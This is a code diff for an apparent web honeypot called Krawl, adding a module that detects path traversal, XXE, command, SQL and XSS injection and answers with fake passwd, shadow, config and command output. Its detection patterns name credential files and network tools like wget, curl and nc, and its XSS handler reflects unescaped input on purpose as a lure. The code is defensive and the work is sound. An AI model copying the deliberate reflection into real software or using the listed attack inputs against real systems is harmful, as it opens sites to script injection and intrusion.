def get_attack_types_stats(self, limit: int = 20) -> Dict[str, Any]:
"""
Get aggregated statistics for attack types (efficient for large datasets).
Args:
limit: Maximum number of attack types to return
Returns:
Dictionary with attack type counts
"""
session = self.session
try:
from sqlalchemy import func
# Aggregate attack types with count
results = (
session.query(
AttackDetection.attack_type,
func.count(AttackDetection.id).label('count')
)
.group_by(AttackDetection.attack_type)
.order_by(func.count(AttackDetection.id).desc())
.limit(limit)
.all()
)
return {
"attack_types": [
{"type": row.attack_type, "count": row.count}
for row in results
]
}
finally:
self.close_session()
# Module-level singleton instance # Module-level singleton instance
_db_manager = DatabaseManager() _db_manager = DatabaseManager()

617
src/deception_responses.py Normal file
View File

@@ -0,0 +1,617 @@
#!/usr/bin/env python3
import re
import random
import logging
import json
from typing import Optional, Tuple, Dict
from generators import random_username, random_password, random_email
from wordlists import get_wordlists
logger = logging.getLogger('krawl')
def detect_path_traversal(path: str, query: str = "", body: str = "") -> bool:
"""Detect path traversal attempts in request"""
full_input = f"{path} {query} {body}"
wl = get_wordlists()
pattern = wl.attack_patterns.get("path_traversal", "")
if not pattern:
# Fallback pattern if wordlists not loaded
pattern = r'(\.\.|%2e%2e|/etc/passwd|/etc/shadow)'
if re.search(pattern, full_input, re.IGNORECASE):
logger.debug(f"Path traversal detected in {full_input[:100]}")
return True
return False
def detect_xxe_injection(body: str) -> bool:
"""Detect XXE injection attempts in XML payloads"""
if not body:
return False
wl = get_wordlists()
pattern = wl.attack_patterns.get("xxe_injection", "")
if not pattern:
# Fallback pattern if wordlists not loaded
pattern = r'(<!ENTITY|<!DOCTYPE|SYSTEM|PUBLIC|file://)'
if re.search(pattern, body, re.IGNORECASE):
return True
return False
def detect_command_injection(path: str, query: str = "", body: str = "") -> bool:
"""Detect command injection attempts"""
full_input = f"{path} {query} {body}"
logger.debug(f"[CMD_INJECTION_CHECK] path='{path}' query='{query}' body='{body[:50] if body else ''}'")
logger.debug(f"[CMD_INJECTION_CHECK] full_input='{full_input[:200]}'")
wl = get_wordlists()
pattern = wl.attack_patterns.get("command_injection", "")
if not pattern:
# Fallback pattern if wordlists not loaded
pattern = r'(cmd=|exec=|command=|&&|;|\||whoami|id|uname|cat|ls)'
if re.search(pattern, full_input, re.IGNORECASE):
logger.debug(f"[CMD_INJECTION_CHECK] Command injection pattern matched!")
return True
logger.debug(f"[CMD_INJECTION_CHECK] No command injection detected")
return False
def generate_fake_passwd() -> str:
"""Generate fake /etc/passwd content"""
wl = get_wordlists()
passwd_config = wl.fake_passwd
if not passwd_config:
# Fallback
return "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin"
users = passwd_config.get("system_users", [])
uid_min = passwd_config.get("uid_min", 1000)
uid_max = passwd_config.get("uid_max", 2000)
gid_min = passwd_config.get("gid_min", 1000)
gid_max = passwd_config.get("gid_max", 2000)
shells = passwd_config.get("shells", ["/bin/bash"])
fake_users = [
f"{random_username()}:x:{random.randint(uid_min, uid_max)}:{random.randint(gid_min, gid_max)}::/home/{random_username()}:{random.choice(shells)}"
for _ in range(3)
]
return "\n".join(users + fake_users)
def generate_fake_shadow() -> str:
"""Generate fake /etc/shadow content"""
wl = get_wordlists()
shadow_config = wl.fake_shadow
if not shadow_config:
# Fallback
return "root:$6$rounds=656000$fake_salt_here$fake_hash_data:19000:0:99999:7:::"
entries = shadow_config.get("system_entries", [])
hash_prefix = shadow_config.get("hash_prefix", "$6$rounds=656000$")
salt_length = shadow_config.get("salt_length", 16)
hash_length = shadow_config.get("hash_length", 86)
fake_entries = [
f"{random_username()}:{hash_prefix}{''.join(random.choices('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789', k=salt_length))}${''.join(random.choices('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789', k=hash_length))}:19000:0:99999:7:::"
for _ in range(3)
]
return "\n".join(entries + fake_entries)
def generate_fake_config_file(filename: str) -> str:
"""Generate fake configuration file content"""
configs = {
"config.php": """<?php
define('DB_HOST', 'localhost');
define('DB_NAME', 'app_database');
define('DB_USER', 'db_user');
define('DB_PASSWORD', 'fake_pass_123');
define('SECRET_KEY', 'fake_secret_key_xyz789');
define('API_ENDPOINT', 'https://api.example.com');
?>""",
"application.properties": """# Database Configuration
spring.datasource.url=jdbc:mysql://localhost:3306/appdb
spring.datasource.username=dbuser
spring.datasource.password=fake_password_123
server.port=8080
jwt.secret=fake_jwt_secret_key_456""",
".env": """DB_HOST=localhost
DB_PORT=3306
DB_NAME=production_db
DB_USER=app_user
DB_PASSWORD=fake_env_password_789
API_KEY=fake_api_key_abc123
SECRET_TOKEN=fake_secret_token_xyz""",
}
for key in configs:
if key.lower() in filename.lower():
return configs[key]
return f"""# Configuration File
api_endpoint = https://api.example.com
api_key = fake_key_{random.randint(1000, 9999)}
database_url = mysql://user:fake_pass@localhost/db
secret = fake_secret_{random.randint(10000, 99999)}
"""
def generate_fake_directory_listing(path: str) -> str:
"""Generate fake directory listing"""
wl = get_wordlists()
dir_config = wl.directory_listing
if not dir_config:
# Fallback
return f"<html><head><title>Index of {path}</title></head><body><h1>Index of {path}</h1></body></html>"
fake_dirs = dir_config.get("fake_directories", [])
fake_files = dir_config.get("fake_files", [])
directories = [(d["name"], d["size"], d["perms"]) for d in fake_dirs]
files = [
(f["name"], str(random.randint(f["size_min"], f["size_max"])), f["perms"])
for f in fake_files
]
html = f"<html><head><title>Index of {path}</title></head><body>"
html += f"<h1>Index of {path}</h1><hr><pre>"
html += f"{'Name':<40} {'Size':<10} {'Permissions':<15}\n"
html += "-" * 70 + "\n"
for name, size, perms in directories:
html += f"{name + '/':<40} {size:<10} {perms:<15}\n"
for name, size, perms in files:
html += f"{name:<40} {size:<10} {perms:<15}\n"
html += "</pre><hr></body></html>"
return html
def generate_path_traversal_response(path: str) -> Tuple[str, str, int]:
"""Generate fake response for path traversal attempts"""
path_lower = path.lower()
logger.debug(f"Generating path traversal response for: {path}")
if "passwd" in path_lower:
logger.debug("Returning fake passwd file")
return (generate_fake_passwd(), "text/plain", 200)
if "shadow" in path_lower:
logger.debug("Returning fake shadow file")
return (generate_fake_shadow(), "text/plain", 200)
if any(ext in path_lower for ext in [".conf", ".config", ".php", ".env", ".properties"]):
logger.debug("Returning fake config file")
return (generate_fake_config_file(path), "text/plain", 200)
if "proc/self" in path_lower:
logger.debug("Returning fake proc info")
return (f"{random.randint(1000, 9999)}", "text/plain", 200)
logger.debug("Returning fake directory listing")
return (generate_fake_directory_listing(path), "text/html", 200)
def generate_xxe_response(body: str) -> Tuple[str, str, int]:
"""Generate fake response for XXE injection attempts"""
wl = get_wordlists()
xxe_config = wl.xxe_responses
if "file://" in body:
if "passwd" in body:
content = generate_fake_passwd()
elif "shadow" in body:
content = generate_fake_shadow()
else:
content = xxe_config.get("default_content", "root:x:0:0:root:/root:/bin/bash") if xxe_config else "root:x:0:0:root:/root:/bin/bash"
if xxe_config and "file_access" in xxe_config:
template = xxe_config["file_access"]["template"]
response = template.replace("{content}", content)
else:
response = f"""<?xml version="1.0"?>
<response>
<status>success</status>
<data>{content}</data>
</response>"""
return (response, "application/xml", 200)
if "ENTITY" in body:
if xxe_config and "entity_processed" in xxe_config:
template = xxe_config["entity_processed"]["template"]
entity_values = xxe_config["entity_processed"]["entity_values"]
entity_value = random.choice(entity_values)
response = template.replace("{entity_value}", entity_value)
else:
response = """<?xml version="1.0"?>
<response>
<status>success</status>
<message>Entity processed successfully</message>
<entity_value>fake_entity_content_12345</entity_value>
</response>"""
return (response, "application/xml", 200)
if xxe_config and "error" in xxe_config:
template = xxe_config["error"]["template"]
messages = xxe_config["error"]["messages"]
message = random.choice(messages)
response = template.replace("{message}", message)
else:
response = """<?xml version="1.0"?>
<response>
<status>error</status>
<message>External entity processing disabled</message>
</response>"""
return (response, "application/xml", 200)
def generate_command_injection_response(input_text: str) -> Tuple[str, str, int]:
"""Generate fake command execution output"""
wl = get_wordlists()
cmd_config = wl.command_outputs
input_lower = input_text.lower()
# id command
if re.search(r'\bid\b', input_lower):
if cmd_config and "id" in cmd_config:
uid = random.randint(cmd_config.get("uid_min", 1000), cmd_config.get("uid_max", 2000))
gid = random.randint(cmd_config.get("gid_min", 1000), cmd_config.get("gid_max", 2000))
template = random.choice(cmd_config["id"])
output = template.replace("{uid}", str(uid)).replace("{gid}", str(gid))
else:
output = f"uid={random.randint(1000, 2000)}(www-data) gid={random.randint(1000, 2000)}(www-data) groups={random.randint(1000, 2000)}(www-data)"
return (output, "text/plain", 200)
# whoami command
if re.search(r'\bwhoami\b', input_lower):
users = cmd_config.get("whoami", ["www-data"]) if cmd_config else ["www-data"]
return (random.choice(users), "text/plain", 200)
# uname command
if re.search(r'\buname\b', input_lower):
outputs = cmd_config.get("uname", ["Linux server 5.4.0 x86_64"]) if cmd_config else ["Linux server 5.4.0 x86_64"]
return (random.choice(outputs), "text/plain", 200)
# pwd command
if re.search(r'\bpwd\b', input_lower):
paths = cmd_config.get("pwd", ["/var/www/html"]) if cmd_config else ["/var/www/html"]
return (random.choice(paths), "text/plain", 200)
# ls command
if re.search(r'\bls\b', input_lower):
if cmd_config and "ls" in cmd_config:
files = random.choice(cmd_config["ls"])
else:
files = ["index.php", "config.php", "uploads"]
output = "\n".join(random.sample(files, k=random.randint(3, min(6, len(files)))))
return (output, "text/plain", 200)
# cat command
if re.search(r'\bcat\b', input_lower):
if "passwd" in input_lower:
return (generate_fake_passwd(), "text/plain", 200)
if "shadow" in input_lower:
return (generate_fake_shadow(), "text/plain", 200)
cat_content = cmd_config.get("cat_config", "<?php\n$config = 'fake';\n?>") if cmd_config else "<?php\n$config = 'fake';\n?>"
return (cat_content, "text/plain", 200)
# echo command
if re.search(r'\becho\b', input_lower):
match = re.search(r'echo\s+(.+?)(?:[;&|]|$)', input_text, re.IGNORECASE)
if match:
return (match.group(1).strip('"\''), "text/plain", 200)
return ("", "text/plain", 200)
# network commands
if any(cmd in input_lower for cmd in ['wget', 'curl', 'nc', 'netcat']):
if cmd_config and "network_commands" in cmd_config:
outputs = cmd_config["network_commands"]
output = random.choice(outputs)
if "{size}" in output:
size = random.randint(cmd_config.get("download_size_min", 100), cmd_config.get("download_size_max", 10000))
output = output.replace("{size}", str(size))
else:
outputs = ["bash: command not found", "Connection timeout"]
output = random.choice(outputs)
return (output, "text/plain", 200)
# generic outputs
if cmd_config and "generic" in cmd_config:
generic_outputs = cmd_config["generic"]
output = random.choice(generic_outputs)
if "{num}" in output:
output = output.replace("{num}", str(random.randint(1, 99)))
else:
generic_outputs = ["", "Command executed successfully", "sh: syntax error"]
output = random.choice(generic_outputs)
return (output, "text/plain", 200)
def detect_sql_injection_pattern(query_string: str) -> Optional[str]:
"""Detect SQL injection patterns in query string"""
if not query_string:
return None
query_lower = query_string.lower()
patterns = {
"quote": [r"'", r'"', r"`"],
"comment": [r"--", r"#", r"/\*", r"\*/"],
"union": [r"\bunion\b", r"\bunion\s+select\b"],
"boolean": [r"\bor\b.*=.*", r"\band\b.*=.*", r"'.*or.*'.*=.*'"],
"time_based": [r"\bsleep\b", r"\bwaitfor\b", r"\bdelay\b", r"\bbenchmark\b"],
"stacked": [r";.*select", r";.*drop", r";.*insert", r";.*update", r";.*delete"],
"command": [r"\bexec\b", r"\bexecute\b", r"\bxp_cmdshell\b"],
"info_schema": [r"information_schema", r"table_schema", r"table_name"],
}
for injection_type, pattern_list in patterns.items():
for pattern in pattern_list:
if re.search(pattern, query_lower):
logger.debug(f"SQL injection pattern '{injection_type}' detected")
return injection_type
return None
def get_random_sql_error(db_type: str = None, injection_type: str = None) -> Tuple[str, str]:
"""Generate a random SQL error message"""
wl = get_wordlists()
sql_errors = wl.sql_errors
if not sql_errors:
return ("Database error occurred", "text/plain")
if not db_type:
db_type = random.choice(list(sql_errors.keys()))
db_errors = sql_errors.get(db_type, {})
if injection_type and injection_type in db_errors:
errors = db_errors[injection_type]
elif "generic" in db_errors:
errors = db_errors["generic"]
else:
all_errors = []
for error_list in db_errors.values():
if isinstance(error_list, list):
all_errors.extend(error_list)
errors = all_errors if all_errors else ["Database error occurred"]
error_message = random.choice(errors) if errors else "Database error occurred"
if "{table}" in error_message:
tables = ["users", "products", "orders", "customers", "accounts", "sessions"]
error_message = error_message.replace("{table}", random.choice(tables))
if "{column}" in error_message:
columns = ["id", "name", "email", "password", "username", "created_at"]
error_message = error_message.replace("{column}", random.choice(columns))
return (error_message, "text/plain")
def generate_sql_error_response(query_string: str, db_type: str = None) -> Tuple[Optional[str], Optional[str], Optional[int]]:
"""Generate SQL error response for detected injection attempts"""
injection_type = detect_sql_injection_pattern(query_string)
if not injection_type:
return (None, None, None)
error_message, content_type = get_random_sql_error(db_type, injection_type)
status_code = 500
if random.random() < 0.3:
status_code = 200
logger.info(f"SQL injection detected: {injection_type}")
return (error_message, content_type, status_code)
def get_sql_response_with_data(path: str, params: str) -> str:
"""Generate fake SQL query response with data"""
injection_type = detect_sql_injection_pattern(params)
if injection_type in ["union", "boolean", "stacked"]:
data = {
"success": True,
"results": [
{
"id": i,
"username": random_username(),
"email": random_email(),
"password_hash": random_password(),
"role": random.choice(["admin", "user", "moderator"]),
}
for i in range(1, random.randint(2, 5))
],
}
return json.dumps(data, indent=2)
return json.dumps(
{"success": True, "message": "Query executed successfully", "results": []},
indent=2,
)
def detect_xss_pattern(input_string: str) -> bool:
"""Detect XSS patterns in input"""
if not input_string:
return False
wl = get_wordlists()
xss_pattern = wl.attack_patterns.get("xss_attempt", "")
if not xss_pattern:
xss_pattern = r"(<script|</script|javascript:|onerror=|onload=|onclick=|<iframe|<img|<svg|eval\(|alert\()"
detected = bool(re.search(xss_pattern, input_string, re.IGNORECASE))
if detected:
logger.debug(f"XSS pattern detected in input")
return detected
def generate_xss_response(input_data: dict) -> str:
"""Generate response for XSS attempts with reflected content"""
xss_detected = False
reflected_content = []
for key, value in input_data.items():
if detect_xss_pattern(value):
xss_detected = True
reflected_content.append(f"<p><strong>{key}:</strong> {value}</p>")
if xss_detected:
logger.info("XSS attempt detected and reflected")
html = f"""
<!DOCTYPE html>
<html>
<head>
<title>Submission Received</title>
<style>
body {{ font-family: Arial, sans-serif; max-width: 600px; margin: 50px auto; padding: 20px; }}
.success {{ background: #d4edda; padding: 20px; border-radius: 8px; border: 1px solid #c3e6cb; }}
h2 {{ color: #155724; }}
p {{ margin: 10px 0; }}
</style>
</head>
<body>
<div class="success">
<h2>Thank you for your submission!</h2>
<p>We have received your information:</p>
{''.join(reflected_content)}
<p><em>We will get back to you shortly.</em></p>
</div>
</body>
</html>
"""
return html
return """
<!DOCTYPE html>
<html>
<head>
<title>Submission Received</title>
<style>
body { font-family: Arial, sans-serif; max-width: 600px; margin: 50px auto; padding: 20px; }
.success { background: #d4edda; padding: 20px; border-radius: 8px; border: 1px solid #c3e6cb; }
h2 { color: #155724; }
</style>
</head>
<body>
<div class="success">
<h2>Thank you for your submission!</h2>
<p>Your message has been received and we will respond soon.</p>
</div>
</body>
</html>
"""
def generate_server_error() -> Tuple[str, str]:
"""Generate fake server error page"""
wl = get_wordlists()
server_errors = wl.server_errors
if not server_errors:
return ("500 Internal Server Error", "text/html")
server_type = random.choice(list(server_errors.keys()))
server_config = server_errors[server_type]
error_codes = {
400: "Bad Request",
401: "Unauthorized",
403: "Forbidden",
404: "Not Found",
500: "Internal Server Error",
502: "Bad Gateway",
503: "Service Unavailable",
}
code = random.choice(list(error_codes.keys()))
message = error_codes[code]
template = server_config.get("template", "")
version = random.choice(server_config.get("versions", ["1.0"]))
html = template.replace("{code}", str(code))
html = html.replace("{message}", message)
html = html.replace("{version}", version)
if server_type == "apache":
os = random.choice(server_config.get("os", ["Ubuntu"]))
html = html.replace("{os}", os)
html = html.replace("{host}", "localhost")
logger.debug(f"Generated {server_type} server error: {code}")
return (html, "text/html")
def get_server_header(server_type: str = None) -> str:
"""Get a fake server header string"""
wl = get_wordlists()
server_errors = wl.server_errors
if not server_errors:
return "nginx/1.18.0"
if not server_type:
server_type = random.choice(list(server_errors.keys()))
server_config = server_errors.get(server_type, {})
version = random.choice(server_config.get("versions", ["1.0"]))
server_headers = {
"nginx": f"nginx/{version}",
"apache": f"Apache/{version}",
"iis": f"Microsoft-IIS/{version}",
"tomcat": f"Apache-Coyote/1.1",
}
return server_headers.get(server_type, "nginx/1.18.0")
def detect_and_respond_deception(path: str, query: str = "", body: str = "", method: str = "GET") -> Optional[Tuple[str, str, int]]:
"""
Main deception detection and response function.
Returns (response_body, content_type, status_code) if deception should be applied, None otherwise.
"""
logger.debug(f"Checking deception for {method} {path} query={query[:50] if query else 'empty'}")
if detect_path_traversal(path, query, body):
logger.info(f"Path traversal detected in: {path}")
return generate_path_traversal_response(f"{path}?{query}" if query else path)
if body and detect_xxe_injection(body):
logger.info(f"XXE injection detected")
return generate_xxe_response(body)
if detect_command_injection(path, query, body):
logger.info(f"Command injection detected in: {path}")
full_input = f"{path} {query} {body}"
return generate_command_injection_response(full_input)
return None

View File

@@ -6,7 +6,7 @@ import time
from datetime import datetime from datetime import datetime
from http.server import BaseHTTPRequestHandler from http.server import BaseHTTPRequestHandler
from typing import Optional, List from typing import Optional, List
from urllib.parse import urlparse, parse_qs from urllib.parse import urlparse, parse_qs, unquote_plus
import json import json
import os import os
@@ -19,7 +19,6 @@ from firewall.iptables import Iptables
from firewall.raw import Raw from firewall.raw import Raw
from tracker import AccessTracker from tracker import AccessTracker
from analyzer import Analyzer
from templates import html_templates from templates import html_templates
from templates.dashboard_template import generate_dashboard from templates.dashboard_template import generate_dashboard
from generators import ( from generators import (
@@ -32,9 +31,14 @@ from generators import (
random_server_header, random_server_header,
) )
from wordlists import get_wordlists from wordlists import get_wordlists
from sql_errors import generate_sql_error_response, get_sql_response_with_data from deception_responses import (
from xss_detector import detect_xss_pattern, generate_xss_response detect_and_respond_deception,
from server_errors import generate_server_error generate_sql_error_response,
get_sql_response_with_data,
detect_xss_pattern,
generate_xss_response,
generate_server_error,
)
from models import AccessLog from models import AccessLog
from ip_utils import is_valid_public_ip from ip_utils import is_valid_public_ip
from sqlalchemy import distinct from sqlalchemy import distinct
@@ -46,7 +50,6 @@ class Handler(BaseHTTPRequestHandler):
webpages: Optional[List[str]] = None webpages: Optional[List[str]] = None
config: Config = None config: Config = None
tracker: AccessTracker = None tracker: AccessTracker = None
analyzer: Analyzer = None
counter: int = 0 counter: int = 0
app_logger: logging.Logger = None app_logger: logging.Logger = None
access_logger: logging.Logger = None access_logger: logging.Logger = None
@@ -70,6 +73,28 @@ class Handler(BaseHTTPRequestHandler):
# Fallback to direct connection IP # Fallback to direct connection IP
return self.client_address[0] return self.client_address[0]
def _build_raw_request(self, body: str = "") -> str:
"""Build raw HTTP request string for forensic analysis"""
try:
# Request line
raw = f"{self.command} {self.path} {self.request_version}\r\n"
# Headers
if hasattr(self, "headers") and self.headers:
for header, value in self.headers.items():
raw += f"{header}: {value}\r\n"
raw += "\r\n"
# Body (if present)
if body:
raw += body
return raw
except Exception as e:
# Fallback to minimal representation if building fails
return f"{self.command} {self.path} (error building full request: {str(e)})"
def _get_category_by_ip(self, client_ip: str) -> str: def _get_category_by_ip(self, client_ip: str) -> str:
"""Get the category of an IP from the database""" """Get the category of an IP from the database"""
return self.tracker.get_category_by_ip(client_ip) return self.tracker.get_category_by_ip(client_ip)
@@ -113,7 +138,8 @@ class Handler(BaseHTTPRequestHandler):
return False return False
try: try:
# Get query parameters parsed_url = urlparse(path)
request_query = parsed_url.query
# Log SQL injection attempt # Log SQL injection attempt
client_ip = self._get_client_ip() client_ip = self._get_client_ip()
@@ -163,6 +189,64 @@ class Handler(BaseHTTPRequestHandler):
pass pass
return True return True
def _handle_deception_response(self, path: str, query: str = "", body: str = "", method: str = "GET") -> bool:
"""
Handle deception responses for path traversal, XXE, and command injection.
Returns True if a deception response was sent, False otherwise.
"""
try:
self.app_logger.debug(f"Checking deception for: {method} {path}")
result = detect_and_respond_deception(path, query, body, method)
if result:
response_body, content_type, status_code = result
client_ip = self._get_client_ip()
user_agent = self.headers.get("User-Agent", "")
# Determine attack type using standardized names from wordlists
full_input = f"{path} {query} {body}".lower()
attack_type_db = None # For database (standardized)
attack_type_log = "UNKNOWN" # For logging (human-readable)
if "passwd" in path.lower() or "shadow" in path.lower() or ".." in path or ".." in query:
attack_type_db = "path_traversal"
attack_type_log = "PATH_TRAVERSAL"
elif body and ("<!DOCTYPE" in body or "<!ENTITY" in body):
attack_type_db = "xxe_injection"
attack_type_log = "XXE_INJECTION"
elif any(pattern in full_input for pattern in ['cmd=', 'exec=', 'command=', 'execute=', 'system=', ';', '|', '&&', 'whoami', 'id', 'uname', 'cat', 'ls', 'pwd']):
attack_type_db = "command_injection"
attack_type_log = "COMMAND_INJECTION"
# Log the attack
self.access_logger.warning(
f"[{attack_type_log} DETECTED] {client_ip} - {path[:100]} - Method: {method}"
)
# Record access before responding (deception returns early)
self.tracker.record_access(
ip=client_ip,
path=path,
user_agent=user_agent,
body=body,
method=method,
raw_request=self._build_raw_request(body)
)
# Send the deception response
self.send_response(status_code)
self.send_header("Content-type", content_type)
self.end_headers()
self.wfile.write(response_body.encode())
return True
except BrokenPipeError:
return True
except Exception as e:
self.app_logger.error(f"Error handling deception response for {path}: {str(e)}")
return False
def generate_page(self, seed: str, page_visit_count: int) -> str: def generate_page(self, seed: str, page_visit_count: int) -> str:
"""Generate a webpage containing random links or canary token""" """Generate a webpage containing random links or canary token"""
@@ -246,13 +330,19 @@ class Handler(BaseHTTPRequestHandler):
base_path = urlparse(self.path).path base_path = urlparse(self.path).path
if base_path in ["/api/search", "/api/sql", "/api/database"]: content_length = int(self.headers.get("Content-Length", 0))
content_length = int(self.headers.get("Content-Length", 0)) if content_length > 0:
if content_length > 0: post_data = self.rfile.read(content_length).decode(
post_data = self.rfile.read(content_length).decode( "utf-8", errors="replace"
"utf-8", errors="replace" )
)
parsed_url = urlparse(self.path)
query_string = parsed_url.query
if self._handle_deception_response(self.path, query_string, post_data, "POST"):
return
if base_path in ["/api/search", "/api/sql", "/api/database"]:
self.access_logger.info( self.access_logger.info(
f"[SQL ENDPOINT POST] {client_ip} - {base_path} - Data: {post_data[:100] if post_data else 'empty'}" f"[SQL ENDPOINT POST] {client_ip} - {base_path} - Data: {post_data[:100] if post_data else 'empty'}"
) )
@@ -283,20 +373,17 @@ class Handler(BaseHTTPRequestHandler):
return return
if base_path == "/api/contact": if base_path == "/api/contact":
content_length = int(self.headers.get("Content-Length", 0)) # Parse URL-encoded POST data properly
if content_length > 0:
post_data = self.rfile.read(content_length).decode(
"utf-8", errors="replace"
)
parsed_data = {} parsed_data = {}
for pair in post_data.split("&"): if post_data:
if "=" in pair: # Use parse_qs for proper URL decoding
key, value = pair.split("=", 1) parsed_qs = parse_qs(post_data)
# parse_qs returns lists, get first value of each
parsed_data = {k: v[0] if v else '' for k, v in parsed_qs.items()}
parsed_data[unquote_plus(key)] = unquote_plus(value) self.app_logger.debug(f"Parsed contact data: {parsed_data}")
xss_detected = any(detect_xss_pattern(v) for v in parsed_data.values()) xss_detected = any(detect_xss_pattern(str(v)) for v in parsed_data.values())
if xss_detected: if xss_detected:
self.access_logger.warning( self.access_logger.warning(
@@ -307,6 +394,16 @@ class Handler(BaseHTTPRequestHandler):
f"[XSS ENDPOINT POST] {client_ip} - {base_path}" f"[XSS ENDPOINT POST] {client_ip} - {base_path}"
) )
# Record access for dashboard tracking (including XSS detection)
self.tracker.record_access(
ip=client_ip,
path=self.path,
user_agent=user_agent,
body=post_data,
method="POST",
raw_request=self._build_raw_request(post_data)
)
try: try:
self.send_response(200) self.send_response(200)
self.send_header("Content-type", "text/html") self.send_header("Content-type", "text/html")
@@ -323,12 +420,8 @@ class Handler(BaseHTTPRequestHandler):
f"[LOGIN ATTEMPT] {client_ip} - {self.path} - {user_agent[:50]}" f"[LOGIN ATTEMPT] {client_ip} - {self.path} - {user_agent[:50]}"
) )
content_length = int(self.headers.get("Content-Length", 0)) # post_data was already read at the beginning of do_POST, don't read again
if content_length > 0: if post_data:
post_data = self.rfile.read(content_length).decode(
"utf-8", errors="replace"
)
self.access_logger.warning(f"[POST DATA] {post_data[:200]}") self.access_logger.warning(f"[POST DATA] {post_data[:200]}")
# Parse and log credentials # Parse and log credentials
@@ -350,7 +443,8 @@ class Handler(BaseHTTPRequestHandler):
# send the post data (body) to the record_access function so the post data can be used to detect suspicious things. # send the post data (body) to the record_access function so the post data can be used to detect suspicious things.
self.tracker.record_access( self.tracker.record_access(
client_ip, self.path, user_agent, post_data, method="POST" client_ip, self.path, user_agent, post_data, method="POST",
raw_request=self._build_raw_request(post_data)
) )
time.sleep(1) time.sleep(1)
@@ -498,9 +592,14 @@ class Handler(BaseHTTPRequestHandler):
user_agent = self.headers.get("User-Agent", "") user_agent = self.headers.get("User-Agent", "")
request_path = urlparse(self.path).path request_path = urlparse(self.path).path
self.app_logger.info(f"request_query: {request_path}") self.app_logger.info(f"request_query: {request_path}")
query_params = parse_qs(urlparse(self.path).query) parsed_url = urlparse(self.path)
query_string = parsed_url.query
query_params = parse_qs(query_string)
self.app_logger.info(f"query_params: {query_params}") self.app_logger.info(f"query_params: {query_params}")
if self._handle_deception_response(self.path, query_string, "", "GET"):
return
# get database reference # get database reference
db = get_database() db = get_database()
session = db.session session = db.session
@@ -934,6 +1033,68 @@ class Handler(BaseHTTPRequestHandler):
self.wfile.write(json.dumps({"error": str(e)}).encode()) self.wfile.write(json.dumps({"error": str(e)}).encode())
return return
# API endpoint for attack types statistics (aggregated)
if self.config.dashboard_secret_path and self.path.startswith(
f"{self.config.dashboard_secret_path}/api/attack-types-stats"
):
self.send_response(200)
self.send_header("Content-type", "application/json")
self.send_header("Access-Control-Allow-Origin", "*")
self.send_header(
"Cache-Control", "no-store, no-cache, must-revalidate, max-age=0"
)
self.send_header("Pragma", "no-cache")
self.send_header("Expires", "0")
self.end_headers()
try:
parsed_url = urlparse(self.path)
query_params = parse_qs(parsed_url.query)
limit = int(query_params.get("limit", ["20"])[0])
limit = min(max(1, limit), 100) # Cap at 100
result = db.get_attack_types_stats(limit=limit)
self.wfile.write(json.dumps(result).encode())
except BrokenPipeError:
pass
except Exception as e:
self.app_logger.error(f"Error fetching attack types stats: {e}")
self.wfile.write(json.dumps({"error": str(e)}).encode())
return
# API endpoint for fetching raw request by log ID
if self.config.dashboard_secret_path and self.path.startswith(
f"{self.config.dashboard_secret_path}/api/raw-request/"
):
try:
# Extract log ID from path: /api/raw-request/123
log_id = int(self.path.split("/")[-1])
raw_request = db.get_raw_request_by_id(log_id)
if raw_request is None:
self.send_response(404)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(json.dumps({"error": "Raw request not found"}).encode())
else:
self.send_response(200)
self.send_header("Content-type", "application/json")
self.send_header("Access-Control-Allow-Origin", "*")
self.send_header("Cache-Control", "no-store, no-cache, must-revalidate, max-age=0")
self.end_headers()
self.wfile.write(json.dumps({"raw_request": raw_request}).encode())
except (ValueError, IndexError):
self.send_response(400)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(json.dumps({"error": "Invalid log ID"}).encode())
except Exception as e:
self.app_logger.error(f"Error fetching raw request: {e}")
self.send_response(500)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(json.dumps({"error": str(e)}).encode())
return
# API endpoint for downloading malicious IPs blocklist file # API endpoint for downloading malicious IPs blocklist file
if ( if (
self.config.dashboard_secret_path self.config.dashboard_secret_path
@@ -1014,10 +1175,9 @@ class Handler(BaseHTTPRequestHandler):
self.wfile.write(b"Internal server error") self.wfile.write(b"Internal server error")
return return
self.tracker.record_access(client_ip, self.path, user_agent, method="GET") self.tracker.record_access(client_ip, self.path, user_agent, method="GET",
raw_request=self._build_raw_request())
# self.analyzer.infer_user_category(client_ip)
# self.analyzer.update_ip_rep_infos(client_ip)
if self.tracker.is_suspicious_user_agent(user_agent): if self.tracker.is_suspicious_user_agent(user_agent):
self.access_logger.warning( self.access_logger.warning(

60
src/migrations/README.md Normal file
View File

@@ -0,0 +1,60 @@
# Database Migrations
This directory contains database migration scripts for Krawl.
From the 1.0.0 stable version we added some features that require schema changes and performance optimizations. These migration scripts ensure that existing users can seamlessly upgrade without data loss or downtime.
## Available Migrations
### add_raw_request_column.py
Adds the `raw_request` column to the `access_logs` table to store complete HTTP requests for forensic analysis.
**Usage:**
```bash
# Run with default database path (src/data/krawl.db)
python3 migrations/add_raw_request_column.py
# Run with custom database path
python3 migrations/add_raw_request_column.py /path/to/krawl.db
```
### add_performance_indexes.py
Adds critical performance indexes to the `attack_detections` table for efficient aggregation and filtering with large datasets (100k+ records).
**Indexes Added:**
- `ix_attack_detections_attack_type` - Speeds up GROUP BY on attack_type
- `ix_attack_detections_type_log` - Composite index for attack_type + access_log_id
**Usage:**
```bash
# Run with default database path
python3 migrations/add_performance_indexes.py
# Run with custom database path
python3 migrations/add_performance_indexes.py /path/to/krawl.db
```
**Post-Migration Optimization:**
```bash
# Compact database and update query planner statistics
sqlite3 /path/to/krawl.db "VACUUM; ANALYZE;"
```
## Running Migrations
All migration scripts are designed to be idempotent and safe to run multiple times. They will:
1. Check if the migration is already applied
2. Skip if already applied
3. Apply the migration if needed
4. Report the result
## Creating New Migrations
When creating a new migration:
1. Name the file descriptively: `action_description.py`
2. Make it idempotent (safe to run multiple times)
3. Add checks before making changes
4. Provide clear error messages
5. Support custom database paths via command line
6. Update this README with usage instructions

View File

@@ -0,0 +1,120 @@
#!/usr/bin/env python3
"""
Migration script to add performance indexes to attack_detections table.
This dramatically improves query performance with large datasets (100k+ records).
"""
import sqlite3
import sys
import os
